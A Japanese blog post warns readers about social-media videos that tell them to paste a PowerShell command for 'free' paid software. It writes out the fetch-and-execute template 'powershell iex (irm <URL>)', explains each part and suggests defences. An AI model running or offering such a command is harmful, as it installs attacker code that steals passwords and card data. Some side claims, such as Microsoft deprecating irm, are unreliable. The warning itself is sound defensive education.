どうも はいぐら! です
今回は、最近よくTikTokに流れてくるPowerShellでコマンド実行させて有料のが無料で使えますよ系の動画は超危険 という話をしたいと思います(注意喚起の記事です)
今回の記事の目次はこのようになっています
- 1. そもそもどういう動画なのか
- 2. そもそもPowerShellとWin+Rとは
- 3. そのツール自体は危険なの?
- 4. コマンドの仕組み
- 5. 実行してしまうとどうなるのか
- 6. 対策方法の紹介
- 7. まとめ
- 8. さらに詳しく知りたい人は
- 9. 参考
この記事などを見て1人でも被害者が減ることを望んでいます
ぜひ最後まで読んで今から始められるセキュリティ対策として知識を身に付けましょう!
1. そもそもどういう動画なのか
TikTokやYouTubeなどで「ChatGPTの有料機能がコマンドで無料で使える」や「Windowsのライセンスをコマンドで有効化できる」といった動画が出回っています
これらの動画にPowerShellで特定のコマンドを実行させる場面があるのですが、そのコマンドがかなり危険なコマンドであり、取り返しのつかない状況にも最悪のケースでなってしまいます
2. そもそもPowerShellとWin+Rとは
そもそもこの2つってなんだ?と思う方がいるかもしれません
そんな方に非常にわかりやすくまとめました
PowerShell → Windowsの裏口に入れる万能リモコン
Win+R ショートカット → 特定のアプリやファイルを実行(ファイル名を指定して実行)
理解できたでしょうか? もし理解ができなくてもこれだけは覚えておいてください、この2つは「なんとなくで使ってはいけない」ということです
3. そのツール自体は危険なの?
PowerShell や Win+Rショートカット自体は全く危険はありません
包丁と同じで、料理にも使えるし、悪用もできる と思っていただければ大丈夫です
(実際、ITエンジニアでは毎日と言っていいほど使ってる人もいます)
4. コマンドの仕組み
じゃあ、その危険な動画ではどのようなコマンドを実行させてくるんだ? と気になった人がいるかもしれません
そこで、コマンドについてわかりやすく書きました
powershell iex (irm <URL>)
powershell → PowerShellで実行
irm → 外(インターネット)からデータを取ってくる
iex → インターネットから取ってきたものをそのまま実行
…の部分は取ってくるものが書かれています
irmやiexの部分をもっと簡単に解説をすると、
irm
見知らぬ人からの怪しい郵便物(招待状)を受け取る
iex
招待状に書かれた内容を、内容を見ずに即座に開封してしまう
見知らぬ人から送られてきた「怪しい招待状」を、「中身を一切確認せずに」受け取り、そのまま「書かれている危険な指示を、あなたの家(PC)の中で即座に実行してしまう」という感じです
5. 実行してしまうとどうなるのか
結論として、「情報窃取型マルウェアが入り、 パスワードやカード情報が盗まれる可能性があります」
もちろん、それ以外の情報が取られたり、PCをリモート操作されてしまう危険性もないとも言えません
もっと簡単に言うならば、このコマンド一つで「財布と家の鍵を知らない人に丸ごと渡す」という感じです
6. 対策方法の紹介
このような事例に対して対策方法として一番効果があるのが
「知らないコマンドを実行しない」
です
まず実行しなければ外部から自分の操作で悪意のあるプログラムをダウンロードしてしまうということは減ります
もちろんそれ以外にも
PowerShellの実行ポリシーを制限する
セキュリティソフトを導入する
SNSで見た"裏技"などは必ず公式情報で裏を取る
これらの対策も効果があります
そして、セキュリティソフトはWindowsなら標準で「Windowsセキュリティ」というソフトが入っていますが、より安心をより求めたいなどがある場合は「ノートンセキュリティ」や「マイクロトレンド」などのセキュリティソフトを導入することも良いと思います
そして、Microsoft側でも対策を積極的に行っています
Microsoft側では先ほど説明したコマンドの一部として
irm
がありますが、これを公式で非推奨としています。
そして、Windows11では特別な操作をしなくてもセキュリティを重視した設計になっておりその1つとして先ほど紹介したWindowsセキュリティがあります
ですが、もし危険なプログラムやウイルスが侵入しても自動で検知などが得意な反面、ウイルスなどが破壊をしたプログラムの修復は苦手なため、もし安心を求めるならセキュリティソフトの導入が良いです
7. まとめ
知らないコマンドは実行しない
もし実行する必要がある場合は公式情報などから学習をして実行すること
8. さらに詳しく知りたい人は
古明地フラン 様 【注意喚起動画】デマ動画に騙されるな! #ClickFix
参考
Microsoft PowerShellドキュメント ↗作成日: 2025年11月16日
更新日: 2025年11月17日